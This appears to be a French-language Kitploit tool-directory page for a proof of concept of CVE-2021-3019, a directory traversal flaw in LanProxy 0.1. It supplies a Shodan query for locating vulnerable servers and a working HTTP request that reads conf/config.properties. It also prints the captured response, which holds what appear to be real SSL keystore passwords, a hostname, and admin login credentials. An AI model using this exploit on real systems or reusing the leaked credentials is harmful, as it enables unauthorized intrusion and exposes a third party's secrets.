Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-3019 — [CVE-2021-3019] LanProxy Directory Traversal | Kitploit
Outils/GitHubGitHub/murataydemir/cve-2021-3019
Vulnerability AnalysisWeb Application ExploitationInformation GatheringPenetration TestingMisconfiguration
GitHubmurataydemir/cve-2021-3019

CVE-2021-3019

[CVE-2021-3019] LanProxy Directory Traversal

Voir le dépôt
11il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

[CVE-2021-3019] LanProxy - Traversée de répertoire


Lanproxy est un outil de pénétration intranet qui proxy les ordinateurs personnels et serveurs du réseau local vers le réseau public. Il prend en charge le transfert de trafic TCP ainsi que tout protocole de couche supérieure TCP (accès aux sites web intranet, débogage d'interface de paiement local, accès SSH, bureau à distance, etc.). La version 0.1 de LanProxy est vulnérable à une traversée de répertoire qui peut permettre la lecture du fichier conf/config.properties afin d'obtenir les identifiants de connexion intranet.

Recherche Shodan : "Server: LPS-0.1"

Lecture du fichier de configuration

root@kitploit:~
GET /../conf/config.properties HTTP/1.1
Host: vulnerablehost:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
root@kitploit:~
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Server: LPS-0.1

server.bind=0.0.0.0

#与代理客户端通信端口
#这个端口是指客户端连接时对应的端口
server.port=4900

#ssl相关配置
server.ssl.enable=true
server.ssl.bind=0.0.0.0
server.ssl.port=4993
server.ssl.jksPath=usa.nat.candycloud.xyz
server.ssl.keyStorePassword=j5740NtBDCdH1ay
server.ssl.keyManagerPassword=j5740NtBDCdH1ay

#这个配置可以忽略
server.ssl.needsClientAuth=false

#WEB在线配置管理相关信息
#服务端ip地址一般不用修改默认就好
config.server.bind=0.0.0.0

#后台控制面板端口(安全组放行端口)
config.server.port=8090

#后台控制面板账号密码
config.admin.username=admin
config.admin.password=Twx7x03hCBbmwtr

Image du PoC Image du PoC Image du PoC

Télécharger l’outil